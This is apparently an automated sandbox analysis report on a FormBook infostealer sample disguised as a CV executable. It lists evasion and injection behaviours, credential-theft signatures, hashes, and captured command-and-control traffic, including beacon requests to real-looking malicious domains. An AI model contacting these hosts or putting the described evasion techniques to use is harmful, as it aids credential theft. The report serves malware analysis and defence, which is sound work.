Edit tour

Windows Analysis Report
CV_ Filipa Barbosa.exe

Overview

General Information

Sample name:	CV_ Filipa Barbosa.exe
Analysis ID:	1561726
MD5:	a3c71c0be44a3f3585056acf51fd4c48
SHA1:	d3d80a14cdefbc31aec5d1e7c776c9e9982d8fc2
SHA256:	e49c85ea7591439d9ee2e654bfbc3a4b4cd3ce2ebcaa30f9cb57f2ab08effc61
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

CV_ Filipa Barbosa.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe" MD5: A3C71C0BE44A3F3585056ACF51FD4C48)

svchost.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

KzlgpZBFalChd.exe (PID: 5716 cmdline: "C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

wlanext.exe (PID: 2500 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)

KzlgpZBFalChd.exe (PID: 5820 cmdline: "C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2998690477.00000000008B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2998739243.0000000000900000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2156547508.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2158110469.0000000006190000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2998584831.00000000027D0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2157416281.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2997273586.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3000295017.00000000058A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", CommandLine: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", CommandLine|base64offset|contains: )b, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", ParentImage: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe, ParentProcessId: 6504, ParentProcessName: CV_ Filipa Barbosa.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", ProcessId: 6712, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", CommandLine: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", CommandLine|base64offset|contains: )b, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", ParentImage: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe, ParentProcessId: 6504, ParentProcessName: CV_ Filipa Barbosa.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe", ProcessId: 6712, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: CV_ Filipa Barbosa.exe	ReversingLabs: Detection: 71%
Source: CV_ Filipa Barbosa.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2998690477.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2998739243.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2156547508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158110469.0000000006190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2998584831.00000000027D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2157416281.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2997273586.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3000295017.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: CV_ Filipa Barbosa.exe

Joe Sandbox ML: detected

Source: CV_ Filipa Barbosa.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KzlgpZBFalChd.exe, 00000005.00000000.2081006806.0000000000EAE000.00000002.00000001.01000000.00000005.sdmp, KzlgpZBFalChd.exe, 00000007.00000000.2223307977.0000000000EAE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: CV_ Filipa Barbosa.exe, 00000000.00000003.1769047257.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, CV_ Filipa Barbosa.exe, 00000000.00000003.1766364071.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2156941988.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2156941988.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2060641634.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2058488879.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2159048079.0000000000968000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2156864856.00000000007BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CV_ Filipa Barbosa.exe, 00000000.00000003.1769047257.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, CV_ Filipa Barbosa.exe, 00000000.00000003.1766364071.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2156941988.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2156941988.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2060641634.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2058488879.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2159048079.0000000000968000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2156864856.00000000007BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.2125682005.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2125796310.000000000362D000.00000004.00000020.00020000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000002.2997873297.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.2125682005.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2125796310.000000000362D000.00000004.00000020.00020000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000002.2997873297.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00336CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00336CA9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_003360DD
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_003363F9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0033EB60
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033F56F FindFirstFileW,FindClose,	0_2_0033F56F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0033F5FA
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00341B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00341B2F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00341C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00341C8A
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00341F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00341F94

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.logidant.xyz

Source: Joe Sandbox View

IP Address: 154.23.184.194 154.23.184.194

Source: Joe Sandbox View

ASN Name: YURTEH-ASUA YURTEH-ASUA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00344EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00344EB5

Source: global traffic	HTTP traffic detected: GET /alo6/?UH=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&E2ThV=44spoH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /ctvu/?UH=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&E2ThV=44spoH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /bryf/?UH=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ=&E2ThV=44spoH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wcq77.topUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /grm8/?UH=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&E2ThV=44spoH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mindfulmo.lifeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /z7sc/?UH=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&E2ThV=44spoH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.bienmaigrir.infoUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)

Source: global traffic	DNS traffic detected: DNS query: www.1secondlending.one
Source: global traffic	DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic	DNS traffic detected: DNS query: www.wcq77.top
Source: global traffic	DNS traffic detected: DNS query: www.mindfulmo.life
Source: global traffic	DNS traffic detected: DNS query: www.bienmaigrir.info

Source: unknown

HTTP traffic detected: POST /ctvu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Cache-Control: no-cacheContent-Length: 199Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.logidant.xyzOrigin: http://www.logidant.xyzReferer: http://www.logidant.xyz/ctvu/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)Data Raw: 55 48 3d 36 32 53 54 37 57 34 47 55 64 56 76 7a 44 56 46 78 71 42 4d 64 47 41 6c 70 67 70 76 63 51 52 38 78 68 67 6a 62 57 74 37 38 56 70 44 36 68 52 42 65 41 32 47 61 39 6c 64 71 75 6b 62 79 47 5a 4b 51 64 6b 6e 6f 7a 78 54 49 32 36 65 69 43 41 39 68 64 46 77 58 4a 35 52 73 66 4d 45 74 33 77 38 75 6f 74 48 34 44 49 44 62 6d 52 59 44 48 48 70 77 5a 41 44 51 66 52 42 57 57 62 4a 41 33 4c 33 49 66 36 4e 6f 62 51 72 47 41 4f 45 6a 73 43 33 4a 32 72 30 53 4a 6c 74 43 4f 76 56 67 41 54 39 45 65 6c 59 56 34 58 71 72 58 46 68 77 74 6b 4f 48 75 2f 50 47 2b 46 63 78 4f 66 49 68 69 7a 4f 57 51 3d 3d Data Ascii: UH=62ST7W4GUdVvzDVFxqBMdGAlpgpvcQR8xhgjbWt78VpD6hRBeA2Ga9ldqukbyGZKQdknozxTI26eiCA9hdFwXJ5RsfMEt3w8uotH4DIDbmRYDHHpwZADQfRBWWbJA3L3If6NobQrGAOEjsC3J2r0SJltCOvVgAT9EelYV4XqrXFhwtkOHu/PG+FcxOfIhizOWQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:04 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:27 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:39 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7b148-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:06:45 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7b148-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
